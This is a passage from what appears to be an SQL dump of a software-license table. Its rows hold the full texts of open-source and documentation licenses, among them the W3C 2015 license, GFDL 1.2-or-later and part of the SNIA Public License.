certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Distributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for Contributors. Therefore,\nif a Distributor includes the Program in a commercial product offering, such\nDistributor (\"Commercial Distributor\") hereby agrees to defend and indemnify\nevery Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Distributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nDistributor in writing of such claim, and b) allow the Commercial Distributor\nto control, and cooperate with the Commercial Distributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Distributor might include the Program in a commercial product\noffering, Product X. That Distributor is then a Commercial Distributor. If\nthat Commercial Distributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nDistributor\'s responsibility alone. Under this section, the Commercial Distributor\nwould have to defend claims against the Contributors related to those performance\nclaims and warranties, and if a court requires any Contributor to pay any\ndamages as a result, the Commercial Distributor must pay those damages.\n\n 5. NO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS\nOR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF\nTITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Program and assumes all risks associated with its\nexercise of rights under this Agreement, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n 6. DISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY\nCONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION\nLOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS\nGRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. GENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against a Contributor with respect\nto a patent applicable to software (including a cross-claim or counterclaim\nin a lawsuit), then any patent licenses granted by that Contributor to such\nRecipient under this Agreement shall terminate as of the date such litigation\nis filed. In addition, if Recipient institutes patent litigation against any\nentity (including a cross-claim or counterclaim in a lawsuit) alleging that\nthe Program itself (excluding combinations of the Program with other software\nor hardware) infringes such Recipient\'s patent(s), then such Recipient\'s rights\ngranted under Section 2(b) shall terminate as of the date such litigation\nis filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\n<OWNER> may publish new versions (including revisions) of this Agreement from\ntime to time. Each new version of the Agreement will be given a distinguishing\nversion number. The Program (including Contributions) may always be distributed\nsubject to the version of the Agreement under which it was received. In addition,\nafter a new version of the Agreement is published, Contributor may elect to\ndistribute the Program (including its Contributions) under the new version.\nNo one other than <OWNER> has the right to modify this Agreement. Except as\nexpressly stated in Sections 2(a) and 2(b) above, Recipient receives no rights\nor licenses to the intellectual property of any Contributor under this Agreement,\nwhether expressly, by implication, estoppel or otherwise. All rights in the\nProgram not expressly granted under this Agreement are reserved.\n\nThis Agreement is governed by the laws of the State of <STATE> and the intellectual\nproperty laws of the United States of America. No party to this Agreement\nwill bring a legal action under this Agreement more than one year after the\ncause of action arose. Each party waives its rights to a jury trial in any\nresulting litigation.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(141,'W3C-20150513','This work is being provided by the copyright holders under the following license.\n\nLicense\n\nBy obtaining and/or copying this work, you (the licensee) agree that you have\nread, understood, and will comply with the following terms and conditions.\n\nPermission to copy, modify, and distribute this work, with or without modification,\nfor any purpose and without fee or royalty is hereby granted, provided that\nyou include the following on ALL copies of the work or portions thereof, including\nmodifications:\n\n• The full text of this NOTICE in a location viewable to users of the redistributed\nor derivative work.\n\n• Any pre-existing intellectual property disclaimers, notices, or terms and\nconditions. If none exist, the W3C Software and Document Short Notice should\nbe included.\n\n• Notice of any changes or modifications, through a copyright statement on\nthe new code or document such as \"This software or document includes material\ncopied from or derived from [title and URI of the W3C document]. Copyright\n(c) [YEAR] W3C® (MIT, ERCIM, Keio, Beihang).\"\n\nDisclaimers\n\nTHIS WORK IS PROVIDED \"AS IS,\" AND COPYRIGHT HOLDERS MAKE NO REPRESENTATIONS\nOR WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO, WARRANTIES\nOF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF\nTHE SOFTWARE OR DOCUMENT WILL NOT INFRINGE ANY THIRD PARTY PATENTS, COPYRIGHTS,\nTRADEMARKS OR OTHER RIGHTS.\n\nCOPYRIGHT HOLDERS WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF ANY USE OF THE SOFTWARE OR DOCUMENT.\n\nThe name and trademarks of copyright holders may NOT be used in advertising\nor publicity pertaining to the work without specific, written prior permission.\nTitle to copyright in this work will at all times remain with copyright holders.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(142,'GFDL-1.2-or-later','GNU Free Documentation License\n\nVersion 1.2, November 2002\n\nCopyright (C) 2000,2001,2002 Free Software Foundation, Inc. 51 Franklin St,\nFifth Floor, Boston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other functional\nand useful document \"free\" in the sense of freedom: to assure everyone the\neffective freedom to copy and redistribute it, with or without modifying it,\neither commercially or noncommercially. Secondarily, this License preserves\nfor the author and publisher a way to get credit for their work, while not\nbeing considered responsible for modifications made by others.\n\nThis License is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work, in any medium, that contains\na notice placed by the copyright holder saying it can be distributed under\nthe terms of this License. Such a notice grants a world-wide, royalty-free\nlicense, unlimited in duration, to use that work under the conditions stated\nherein. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\". You accept the license\nif you copy, modify or distribute the work in a way requiring permission under\ncopyright law.\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(Thus, if the Document is in part a textbook of mathematics, a Secondary Section\nmay not explain any mathematics.) The relationship could be a matter of historical\nconnection with the subject or with related matters, or of legal, commercial,\nphilosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License. If a section does not fit the above definition\nof Secondary then it is not allowed to be designated as Invariant. The Document\nmay contain zero Invariant Sections. If the Document does not identify any\nInvariant Sections then there are none.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License. A Front-Cover Text may be at most 5 words, and a Back-Cover\nText may be at most 25 words.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, that is\nsuitable for revising the document straightforwardly with generic text editors\nor (for images composed of pixels) generic paint programs or (for drawings)\nsome widely available drawing editor, and that is suitable for input to text\nformatters or for automatic translation to a variety of formats suitable for\ninput to text formatters. A copy made in an otherwise Transparent file format\nwhose markup, or absence of markup, has been arranged to thwart or discourage\nsubsequent modification by readers is not Transparent. An image format is\nnot Transparent if used for any substantial amount of text. A copy that is\nnot \"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML, PostScript or PDF designed\nfor human modification. Examples of transparent image formats include PNG,\nXCF and JPG. Opaque formats include proprietary formats that can be read and\nedited only by proprietary word processors, SGML or XML for which the DTD\nand/or processing tools are not generally available, and the machine-generated\nHTML, PostScript or PDF produced by some word processors for output purposes\nonly.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\nA section \"Entitled XYZ\" means a named subunit of the Document whose title\neither is precisely XYZ or contains XYZ in parentheses following text that\ntranslates XYZ in another language. (Here XYZ stands for a specific section\nname mentioned below, such as \"Acknowledgements\", \"Dedications\", \"Endorsements\",\nor \"History\".) To \"Preserve the Title\" of such a section when you modify the\nDocument means that it remains a section \"Entitled XYZ\" according to this\ndefinition.\n\nThe Document may include Warranty Disclaimers next to the notice which states\nthat this License applies to the Document. These Warranty Disclaimers are\nconsidered to be included by reference in this License, but only as regards\ndisclaiming warranties: any other implication that these Warranty Disclaimers\nmay have is void and has no effect on the meaning of this License.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies (or copies in media that commonly have printed\ncovers) of the Document, numbering more than 100, and the Document\'s license\nnotice requires Cover Texts, you must enclose the copies in covers that carry,\nclearly and legibly, all these Cover Texts: Front-Cover Texts on the front\ncover, and Back-Cover Texts on the back cover. Both covers must also clearly\nand legibly identify you as the publisher of these copies. The front cover\nmust present the full title with all words of the title equally prominent\nand visible. You may add other material on the covers in addition. Copying\nwith changes limited to the covers, as long as they preserve the title of\nthe Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a computer-network\nlocation from which the general network-using public has access to download\nusing public-standard network protocols a complete Transparent copy of the\nDocument, free of added material. If you use the latter option, you must take\nreasonably prudent steps, when you begin distribution of Opaque copies in\nquantity, to ensure that this Transparent copy will remain thus accessible\nat the stated location until at least one year after the last time you distribute\nan Opaque copy (directly or through your agents or retailers) of that edition\nto the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has fewer than five), unless they release you from this requirement.\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice.\n\n H. Include an unaltered copy of this License.\n\nI. Preserve the section Entitled \"History\", Preserve its Title, and add to\nit an item stating at least the title, year, new authors, and publisher of\nthe Modified Version as given on the Title Page. If there is no section Entitled\n\"History\" in the Document, create one stating the title, year, authors, and\npublisher of the Document as given on its Title Page, then add an item describing\nthe Modified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. For any section Entitled \"Acknowledgements\" or \"Dedications\", Preserve\nthe Title of the section, and preserve in the section all the substance and\ntone of each of the contributor acknowledgements and/or dedications given\ntherein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section Entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section to be Entitled \"Endorsements\" or to\nconflict in title with any Invariant Section.\n\n O. Preserve any Warranty Disclaimers.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section Entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice, and that you preserve all their\nWarranty Disclaimers.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections Entitled \"History\" in the\nvarious original documents, forming one section Entitled \"History\"; likewise\ncombine any sections Entitled \"Acknowledgements\", and any sections Entitled\n\"Dedications\". You must delete all sections Entitled \"Endorsements\".\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\nis called an \"aggregate\" if the copyright resulting from the compilation is\nnot used to limit the legal rights of the compilation\'s users beyond what\nthe individual works permit. When the Document is included in an aggregate,\nthis License does not apply to the other works in the aggregate which are\nnot themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one half of the entire aggregate,\nthe Document\'s Cover Texts may be placed on covers that bracket the Document\nwithin the aggregate, or the electronic equivalent of covers if the Document\nis in electronic form. Otherwise they must appear on printed covers that bracket\nthe whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License, and all the license notices in the Document, and any Warranty\nDisclaimers, provided that you also include the original English version of\nthis License and the original versions of those notices and disclaimers. In\ncase of a disagreement between the translation and the original version of\nthis License or a notice or disclaimer, the original version will prevail.\n\nIf a section in the Document is Entitled \"Acknowledgements\", \"Dedications\",\nor \"History\", the requirement (section 4) to Preserve its Title (section 1)\nwill typically require changing the actual title.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided for under this License. Any other attempt to copy, modify,\nsublicense or distribute the Document is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nADDENDUM: How to use this License for your documents\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME . Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.2 or any later version published by the Free Software Foundation;\nwith no Invariant Sections , no Front-Cover Texts , and no Back-Cover Texts\n. A copy of the license is included in the section entitled \"GNU Free Documentation\nLicense\".\n\nIf you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace\nthe \"with...Texts.\" line with this:\n\nwith the Invariant Sections being LIST THEIR TITLES, with the Front-Cover\nTexts being LIST, and with the Back-Cover Texts being LIST.\n\nIf you have Invariant Sections without Cover Texts, or some other combination\nof the three, merge those two alternatives to suit the situation.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(143,'SNIA','STORAGE NETWORKING INDUSTRY ASSOCIATION\n\nPUBLIC LICENSE\n\nVersion 1.1\n\n 1. Definitions.\n\n1.1 \"Commercial Use\" means distribution or otherwise making the Covered Code\navailable to a third party.\n\n1.2 \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.3 \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.4 \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.5 \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.6 \"Executable\" means Covered Code in any form other than Source Code.\n\n1.7 \"Initial Developer\" means the individual or entity identified as the Initial\nDeveloper in the Source Code notice required by Exhibit A.\n\n1.8 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.9 \"License\" means this document.\n\n1.10 \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n1.11 \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.12 \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.13 \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.14 \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.15 \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity\n\n 2. Source Code License.\n\n2.1 The Initial Developer Grant. The Initial Developer hereby grants You a\nworld-wide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n2.2 Contributor Grant. Subject to third party intellectual property claims,\neach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1 Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2 Availability of Source Code. Any Modification which You create or to which\nYou contribute must be made available in Source Code form under the terms\nof this License either on the same media as an Executable version or via an\naccepted Electronic Distribution Mechanism to anyone to whom you made an Executable\nversion available; and if made available via Electronic Distribution Mechanism,\nmust remain available for at least twelve (12) months after the date it initially\nbecame available, or at least six (6) months after a subsequent version of\nthat particular Modification has been made available to such recipients. You\nare responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3 Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4 Intellectual Property Matters.\n\n(a) Third Party Claims. If Contributor has actual knowledge that a license\nunder a third party\'s intellectual property rights is required to exercise\nthe rights granted by such Contributor under Sections 2.1 or 2.2, Contributor\nmust include a text file with the Source Code distribution titled \"LEGAL\"\nwhich describes the claim and the party making the claim in sufficient detail\nthat a recipient will know whom to contact. If Contributor obtains such knowledge\nafter the Modification is made available as described in Section 3.2, Contributor\nshall promptly modify the LEGAL file in all copies Contributor makes available\nthereafter.\n\n(b) Contributor API\'s. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has actual knowledge of patent licenses\nwhich are reasonably necessary to implement that API, Contributor must also\ninclude this information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n3.5 Required Notices. You must duplicate the notice in Exhibit A in each file\nof the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be most likely\nto look for such a notice. If You created one or more Modification(s) You\nmay add your name as a Contributor to the notice described in Exhibit A. You\nmust also duplicate this License in any documentation for the Source Code\nwhere You describe recipients\' rights or ownership rights relating to Covered\nCode. You may choose to offer, and to charge a fee for, warranty, support,\nindemnity or liability obligations to one or more recipients of Covered Code.\nHowever, You may do so only on Your own behalf, and not on behalf of the Initial\nDeveloper or any Contributor. You must make it absolutely clear that any such\nwarranty, support, indemnity or liability obligation is offered by You alone,\nand You hereby agree to indemnify the Initial Developer and every Contributor\nfor any liability (excluding any liability arising from intellectual property\nclaims relating to the Covered Code) incurred by the Initial Developer or\nsuch Contributor as a result of warranty, support, indemnity or liability\nterms You offer.\n\n3.6 Distribution of Executable Versions. You may distribute Covered Code in\nExecutable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligation\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code or ownership rights under a license of Your choice,\nwhich may contain terms different from this License, provided that You are\nin compliance with the terms of this License and that the license for the\nExecutable version does not attempt to limit or alter the recipient\'s rights\nin the Source Code version from the rights set forth in this License. If You\ndistribute the Executable version under a different license You must make\nit absolutely clear that any terms which differ from this License are offered\nby You alone, not by the Initial Developer or any Contributor. You hereby\nagree to indemnify the Initial Developer and every Contributor for any liability\n(excluding any liability arising from intellectual property claims relating\nto the Covered Code) incurred by the Initial Developer or such Contributor\nas a result of any such terms You offer.\n\n3.7 Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n4. Inability to Comply Due to Statute or Regulation. If it is impossible for\nYou to comply with any of the terms of this License with respect to some or\nall of the Covered Code due to statute, judicial order, or regulation then\nYou must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such\ndescription must be included in the LEGAL file described in Section 3.4 and\nmust be included with all distributions of the Source Code. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n5. Application of this License. This License applies to code to which the\nInitial Developer has attached the notice in Exhibit A and to related Covered\nCode.\n\n 6. Versions of the License.\n\n6.1 New Versions. The Storage Networking Industry Association (the \"SNIA\")\nmay publish revised and/or new versions of the License from time to time.\nEach version will be given a distinguishing version number.\n\n6.2 Effect of New Versions. Once Covered Code has been 